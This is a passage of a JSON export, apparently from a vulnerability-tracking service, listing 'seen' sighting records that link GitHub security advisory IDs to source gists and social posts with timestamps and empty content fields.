"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "0b8e1e71-a4d1-4020-b773-ff1cfb08fc39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/6ca8378beb55fbe9cea560adbf0dae10", "content": "", "creation_timestamp": "2025-07-16T08:37:49.000000Z"}, {"uuid": "69b9c374-a373-4890-b90f-93964c4460cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "68025a78-bf06-4e11-8acf-739d2d9ef5cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/0a516166b329057e81ec35ad6fb00e3b", "content": "", "creation_timestamp": "2025-07-16T03:56:59.000000Z"}, {"uuid": "ba1a8070-3fea-41cd-968e-73db0dca9368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "c70f45bb-c150-4312-b48b-36c74ed77e5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "f4e147ab-9def-4c13-9f06-ad647718fd90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/1d1615c6e4b7647e371847fe955b8aab", "content": "", "creation_timestamp": "2025-07-16T08:40:45.000000Z"}, {"uuid": "7ee2090e-daeb-493f-8577-cc620326a159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/1d1615c6e4b7647e371847fe955b8aab", "content": "", "creation_timestamp": "2025-07-16T08:40:45.000000Z"}, {"uuid": "67b6099d-3fd0-4965-8c40-874079907df0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "f1d69c1c-b0c2-4e87-a96f-79cd86eb31b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xr54-gx74-fghg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114467343284596625", "content": "", "creation_timestamp": "2025-05-07T15:50:46.389105Z"}, {"uuid": "29d2ba80-da2b-4360-8415-f79477f3745f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-76vf-mpmx-777j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114467567755058452", "content": "", "creation_timestamp": "2025-05-07T16:47:51.656781Z"}, {"uuid": "61781365-f396-4dcf-a06f-67a465133eca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "a74b166c-8dae-4b38-a73e-b90b4eab6ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "3b911827-2a56-4478-b7f5-60ed3f05f485", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpg-vgmx-xg6w", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "ebef5cc4-1e96-42b2-9699-4fcf69825f9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "68e1f2cb-ddd1-4300-b840-761af378cdf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "20c2a19c-6b4f-4260-8dd8-58c51d455722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/7acf509dcfb71df595ee37b212f6759b", "content": "", "creation_timestamp": "2025-07-16T04:14:47.000000Z"}, {"uuid": "9e3a4d2a-23a5-4e82-a32f-dd41270023c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/457725ca95a415c52e796fae7aef4e78", "content": "", "creation_timestamp": "2025-07-16T08:59:33.000000Z"}, {"uuid": "f9f7b644-06e3-4d80-b2b0-db844a076d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/482e2fcb23997913771508acaa4ef1a2", "content": "", "creation_timestamp": "2025-07-16T10:39:17.000000Z"}, {"uuid": "c010dc16-d66e-4371-9673-3daf9eee0a5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "97ced76f-de93-4336-b2e8-f68d74c9cab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "9757366c-5daf-4516-9080-483f8e7606a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24ch-w38v-xmh8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114818741708384892", "content": "", "creation_timestamp": "2025-07-08T17:16:00.873211Z"}, {"uuid": "c5260893-520f-4fce-967c-1aaca52b8615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/49748eac9047aec56b3f171b99189fa6", "content": "", "creation_timestamp": "2025-07-16T04:18:37.000000Z"}, {"uuid": "dade2e63-9b3d-44df-a3fb-2aaa114ac44c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a67091c6e8c05d2a2b5d2a0d844f915e", "content": "", "creation_timestamp": "2025-07-16T10:40:22.000000Z"}, {"uuid": "162a3a9e-b615-4ca2-8b65-ff1ab05dfbe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/8ca95a0a9eaae97e005bc7a37e914436", "content": "", "creation_timestamp": "2025-07-16T12:50:37.000000Z"}, {"uuid": "4916a80f-bfe0-4e88-bcd0-0642c625c944", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "97995b09-6034-48a5-bf0b-e26405dd758b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/16d0b45f6c38b7c78a69e322490eed27", "content": "", "creation_timestamp": "2025-07-16T14:21:14.000000Z"}, {"uuid": "52e5bbaf-322e-4d55-a218-8ac777f52669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/16d0b45f6c38b7c78a69e322490eed27", "content": "", "creation_timestamp": "2025-07-16T14:21:14.000000Z"}, {"uuid": "7a4256d4-4e1d-4832-86f5-d032155c3b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9cmq-m9j5-mvww", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "7aa3d16a-9a5b-49c8-8105-9a1ea4aca4fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "a1b3814a-9f27-47f1-8798-21e0758f6dba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "e6e8f789-946d-41d4-b3f4-76462f90a20d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "9fe38c68-d15b-40f6-bf5f-2e64d2c6e47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/49748eac9047aec56b3f171b99189fa6", "content": "", "creation_timestamp": "2025-07-16T04:18:37.000000Z"}, {"uuid": "aaac9e00-aeea-4b2d-ac14-e61424b4851c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/955317103e8132e4c70e8f6e4911258f", "content": "", "creation_timestamp": "2025-07-16T10:42:41.000000Z"}, {"uuid": "f72a5665-3c72-48fa-9dc6-429de7551692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/8ca95a0a9eaae97e005bc7a37e914436", "content": "", "creation_timestamp": "2025-07-16T12:50:37.000000Z"}, {"uuid": "3233f6c3-b90d-4d48-ac3c-f91b9c257d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/475a3e7d9e9594e3c6e8c0083f2731da", "content": "", "creation_timestamp": "2025-07-16T13:39:40.000000Z"}, {"uuid": "94663442-86b7-4726-8829-d0279b1c09c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "5d8744a2-9626-4f50-b6d6-e9c271a6398c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "ded26c4d-fbcf-4eec-8653-08f0ae4ca9d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/0ab134245317e0e08fb8a767dfb3564e", "content": "", "creation_timestamp": "2025-07-16T14:22:55.000000Z"}, {"uuid": "33856c6e-23a3-4fde-97dc-6112f1ce35df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/0ab134245317e0e08fb8a767dfb3564e", "content": "", "creation_timestamp": "2025-07-16T14:22:55.000000Z"}, {"uuid": "75a8f944-2350-4bfb-baaa-6033f7629bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0ab134245317e0e08fb8a767dfb3564e", "content": "", "creation_timestamp": "2025-07-16T14:22:55.000000Z"}, {"uuid": "3d700aac-1c12-40f8-a78d-f73a3f1a8990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/0ab134245317e0e08fb8a767dfb3564e", "content": "", "creation_timestamp": "2025-07-16T14:22:55.000000Z"}, {"uuid": "1f2851a8-7c6f-4bed-b894-e20237d34575", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33hw-xhfh-944r", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-a45bca37-2eeedf36bb4d3150", "content": "", "creation_timestamp": "2025-05-09T17:05:26.725761Z"}, {"uuid": "a33e3dcb-9647-4692-9af1-8d26821c2ff8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p483-wpfp-42cj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114479986017956254", "content": "", "creation_timestamp": "2025-05-09T21:25:59.304530Z"}, {"uuid": "1f119f0c-3577-4348-8914-69f472f6bd1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:1453", "type": "seen", "source": "https://gist.github.com/spbhalekar/aace19c915c00f5aaf0a2e955f4009ec", "content": "", "creation_timestamp": "2025-06-07T08:39:08.000000Z"}, {"uuid": "23d07de5-22bc-44a1-902b-41e876a18123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/49748eac9047aec56b3f171b99189fa6", "content": "", "creation_timestamp": "2025-07-16T04:18:37.000000Z"}, {"uuid": "625991fb-6260-4848-90b4-8b92696e6480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/955317103e8132e4c70e8f6e4911258f", "content": "", "creation_timestamp": "2025-07-16T10:42:41.000000Z"}, {"uuid": "94adf640-ed3c-4d00-bb48-ce38adc20274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8ca95a0a9eaae97e005bc7a37e914436", "content": "", "creation_timestamp": "2025-07-16T12:50:37.000000Z"}, {"uuid": "6fd0eb83-74f4-4318-bca3-1c0a46ba2949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "b7442ed8-3e7f-4aa5-88fb-51e64f7a68b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/35290a8dbed9617245066a9f02ddd471", "content": "", "creation_timestamp": "2025-07-16T13:39:03.000000Z"}, {"uuid": "4e5ab785-5eae-4c79-b232-8ccf6f5d96a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/bb57d982dbde7dd5db76bd622e6ab454", "content": "", "creation_timestamp": "2025-07-16T14:25:12.000000Z"}, {"uuid": "8e5bce0b-b71d-4fbe-9b9e-3a2174ce9127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/3010dc0aed11828e4d3c52776c3777c7", "content": "", "creation_timestamp": "2025-07-16T14:40:50.000000Z"}, {"uuid": "482b87cc-0ecf-41de-abe6-8e2f1cdea2f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "dd881e3b-11d6-4b2b-a9d0-e147b88f65dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "1a30bfd1-9405-48d4-81a6-445f21042478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "2dcf51b9-f5d3-4062-ba45-974b4c62c8b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "d9492631-ca68-4977-b2ac-be20c9558923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "1b613e84-ec37-41a2-8f5f-9ddcc750b703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "ee3b55c2-8599-4421-b58a-6455a4dff95d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "d11d2ad0-56df-426b-ae9c-8e9f8dc76ec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/3a83bd8d1162087668387e7dbb3d9cc1", "content": "", "creation_timestamp": "2025-07-16T04:20:43.000000Z"}, {"uuid": "25470ebc-27cd-4343-9a2f-ada388162892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/4b10143ccd0e3b1b7053c1d70ff0df7d", "content": "", "creation_timestamp": "2025-07-16T09:01:39.000000Z"}, {"uuid": "729ee2eb-44cf-42a5-aa81-d88ff2028df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/955317103e8132e4c70e8f6e4911258f", "content": "", "creation_timestamp": "2025-07-16T10:42:41.000000Z"}, {"uuid": "1f45482b-7fb4-4ac6-b704-2401c68d12c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "6f9c9376-de5c-41b1-927c-e91062b6da64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "b3219058-f135-462f-887f-29128e5875e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "8bac83be-1a39-4d83-82c3-a7bd7ef35d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/930216c8ddbe20a630c79f2785e35eec", "content": "", "creation_timestamp": "2025-07-16T04:24:10.000000Z"}, {"uuid": "19e19513-da74-42a9-bcab-163c2a494fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p53j-g8pw-4w5f", "type": "seen", "source": "https://gist.github.com/safer-bot/930216c8ddbe20a630c79f2785e35eec", "content": "", "creation_timestamp": "2025-07-16T04:24:10.000000Z"}, {"uuid": "23e1f783-7437-4390-8b45-a6ffb4770938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/036960d32c339013d2ba1e851a580665", "content": "", "creation_timestamp": "2025-07-16T09:02:36.000000Z"}, {"uuid": "2b983849-b22d-4d02-b89b-3d83ad56d059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/036960d32c339013d2ba1e851a580665", "content": "", "creation_timestamp": "2025-07-16T09:02:36.000000Z"}, {"uuid": "da77a727-c8ca-4407-a897-0c401a01b77d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/036960d32c339013d2ba1e851a580665", "content": "", "creation_timestamp": "2025-07-16T09:02:36.000000Z"}, {"uuid": "48ad4f4c-be34-4a49-b1ec-8b0fc2eab5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": 